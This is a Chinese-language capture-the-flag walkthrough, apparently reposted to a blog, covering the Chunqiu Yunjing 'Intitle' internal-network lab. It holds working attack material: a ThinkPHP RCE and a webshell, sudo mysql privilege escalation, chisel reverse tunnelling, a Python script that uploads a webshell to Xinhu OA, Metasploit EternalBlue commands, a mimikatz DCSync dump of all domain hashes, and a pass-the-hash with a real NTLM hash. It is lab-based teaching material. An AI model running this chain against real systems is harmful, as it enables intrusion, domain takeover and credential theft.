【内网渗透】春秋云镜Intitle WP

这篇具有很好参考价值的文章主要介绍了【内网渗透】春秋云镜Intitle WP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新

信息收集

拿到地址先nmap扫端口
【内网渗透】春秋云镜Intitle WP没什么发现,直接访问80端口,看到图标知道是thinkphp
【内网渗透】春秋云镜Intitle WP

第一台Thinkphp

用thinkphp漏洞集成工具测试,发现有rce的漏洞
【内网渗透】春秋云镜Intitle WP
一键getshell,用蚁剑连上去
【内网渗透】春秋云镜Intitle WP
whoami,发现权限比较低
【内网渗透】春秋云镜Intitle WP
查命令

find / -user root -perm -40002>/dev/null

有一个sudo可以用
sudo -l看看
sudo -l就是列出目前用户可执行与无法执行的指令
【内网渗透】春秋云镜Intitle WP
看到有个mysql,网上查一查
这个网站很不错,有各种命令的提权手段:

https://gtfobins.github.io/

可以看到
【内网渗透】春秋云镜Intitle WP
执行命令
sudo mysql -e ‘! ls /root’
然后读取
【内网渗透】春秋云镜Intitle WP
得到第一段flag
那这台的flag已经找到了,也没什么可用信息,接下来就是打内网,ifconfig看看
【内网渗透】春秋云镜Intitle WP

传fscan到靶机上(其实保险一点可以不用传,配好代理通过本机也可以扫到的),传上以后chmod给权限再用
用fscan扫c段

fscan_amd64 -h 172.22.1.0/24
cat result.txt

得到

172.22.1.15:22 open
172.22.1.18:139 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:135 open
172.22.1.21:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.18:445 open
172.22.1.21:445 open
172.22.1.2:445 open
[+] 172.22.1.21    MS17-010    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

明显看到一个信呼oa,那么先搭建代理才能让我们访问到内网,这里我用的是chisel,github搜一下就有
在你的vps执行:

./chisel server -p 1234 --reverse

在跳板机(也就是我们已经getshell的机子上)执行:

./chisel client vpsip:1234 R:0.0.0.0:1235:socks

然后google插件配代理
【内网渗透】春秋云镜Intitle WP
或者通过profixier配,profixier的话比较好用一点,相当于一个全局的代理,可以让本机和靶机进行远程桌面连接,这是后话
【内网渗透】春秋云镜Intitle WP
配好以后就可以在自己的电脑上访问到靶机内网的内容了

第二台 信呼OA(内网)

因为有一个oa所以先访问这个系统
【内网渗透】春秋云镜Intitle WP
有版本号,网上搜一下有漏洞,这里直接用别的师傅的脚本攻击

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

这里我print了一下路径,1.php改成post传参就行,然后看返回的路径去蚁剑连接
【内网渗透】春秋云镜Intitle WP
url/upload/xxxx
在这个地方找到flag2
【内网渗透】春秋云镜Intitle WP

第三个FLAG

现在剩最后一个flag了,应该在DC上,但是我们需要通过域内的另一台靶机去攻击,通过前面的信息收集可以知道
【内网渗透】春秋云镜Intitle WP

这里有永恒之蓝,用msf攻击
先在kali上配置好proxychains

vim /etc/proxychains.conf

【内网渗透】春秋云镜Intitle WP
格式为:代理规则 ip 端口
然后启动msf,攻击

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

【内网渗透】春秋云镜Intitle WP
攻击成功后我们会得到一个正向连接的shell
用load kiwi来调用mimikatz模块,然后抓取用户的hash

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit  # 导出域内所有用户的信息(包括哈希值)

【内网渗透】春秋云镜Intitle WP
可以看到这里直接有Administrator的hash值,用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

成功读取到最后一串flag

知识点:代理搭建,mimakatze基础用法,哈希传递攻击,DCSync,crackmapexec使用文章来源地址https://www.toymoban.com/news/detail-427290.html

到了这里,关于【内网渗透】春秋云镜Intitle WP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [春秋云镜]CVE-2021-41402

    flatCore-CMS v2.0.8 存在后台任意代码执行漏洞 春秋云镜开启靶场: http://eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com/ 前台爆破不了 我们先扫一下目录 Login eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com http://eci-2ze1lmby62ykdsxiv9c1.cloudeci1.ichunqiu.com/robots.txt 发现后台   使用0day登录后台 流程 Addons--I

    2024年02月12日
    浏览(44)
  • [春秋云镜]CVE-2014-3529

    Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。 春秋云镜开启靶场: http://eci-2ze9wvzaypj11h8emteu.cloudeci1.ichunqiu.com:8080/ 一:使用python开启一个web服务 python -m http.server 80 二:

    2023年04月19日
    浏览(30)
  • [春秋云镜]CVE-2021-32305

    WebSVN是一个基于Web的Subversion Repository浏览器,可以查看文件或文件夹的日志,查看文件的变化列表等。其search.php?search= 参数下过滤不严谨导致RCE。 春秋云镜开启靶场: http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com 验证漏洞 http://eci-2ze4llupfqpd6hmetmkb.cloudeci1.ichunqiu.com/search.php?sear

    2024年02月11日
    浏览(39)
  • 春秋云镜 CVE-2019-16113

    在Bludit=3.9.2的版本中,攻击者可以通过定制uuid值将文件上传到指定的路径,然后通过bl-kernel/ajax/upload-images.php远程执行任意代码。 exp https://github.com/Kenun99/CVE-2019-16113-Dockerfile 修改poc.py,nc监听,反弹shell。 执行命令获取flag 得到flag flag{c54ea59f-e023-405a-af22-0202790209f2}

    2024年02月11日
    浏览(33)
  • 春秋云镜 CVE-2022-24124

    Casdoor是开源的一个身份和访问管理(IAM)/单点登录(SSO)平台,标记支持OAuth 2.0 / OIDC和SAML身份验证的Web UI。 Casdoor 1.13.1之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。 网上poc,获取版本号 /api/get-organizations?p=123pageSize=123value=cfxsortField=sortOrder=field=upd

    2024年02月13日
    浏览(33)
  • 1、[春秋云镜]CVE-2022-32991

      靶场提示:该CMS的welcome.php中存在SQL注入攻击。   NVD关于漏洞的描述:   注入点不仅在 eid 处!!! (1)既然NVD说漏洞在welcome.php处,且参数为 eid ,先注册账号。 (2)登录账号后,发现页面就是welcome.php。 (3)随便点一个 action ,点点 submit ,会发现url中的n参数

    2024年02月11日
    浏览(35)
  • [春秋云镜] CVE-2022-28060 详细讲解

    目录 前期准备 工具+环境 渗透测试 靶场提示 靶场测试 burpsuite SQLmap Victor CMS v1.0 /includes/login.php 存在sql注入 1.打开开启的靶场,右边发现一个登入界面   2.任意输入账号密码,打开burpsuite进行抓包 3.将抓到的包放入一个文件,使用SQLmap去爆破 4.爆破出来之后,选择y生成文件,

    2024年02月13日
    浏览(37)
  • [春秋云镜]CVE-2020-19960,CVE-2020-19961

    zz cms 2019 存在sql注入漏洞 (CVE-2020-19960,CVE-2020-19961即可通关文件上传漏洞获取flag) 春秋云镜开启靶场: http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/ 后台 http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1.ichunqiu.com/admin/login.php 账号admin 密码admin 登录进来找上传点  http://eci-2ze8ijgd72hpnfb6jdt8.cloudeci1

    2024年02月14日
    浏览(33)
  • 春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

      靶标介绍: Subrion CMS 4.2.1 存在文件上传漏洞 进入题目: admin/admin    点击设置:  后台管理主页:  上传页面: 上传目录: /panel/uploads/   查看上传位置:  上传位置:  uploads/system.pht  flag{24505f02-d430-4d3b-905e-17349e09c34c}

    2024年02月11日
    浏览(33)
  • 2023年春秋杯网络安全联赛 春季赛 wp

    第一部分求解一下pell函数得到x,y 直接使用二项式展开定理即可还原flag 可以直接将z表示出来然后就能求解key了 1day,一个SQL注入改管理员的密码。 payload: 然后计划任务执行读取flag或者反弹shell即可。 上来扫到了dowload目录,然后pyc反编译得到源码。 在numpy.loads存在pickle反序

    2024年02月13日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包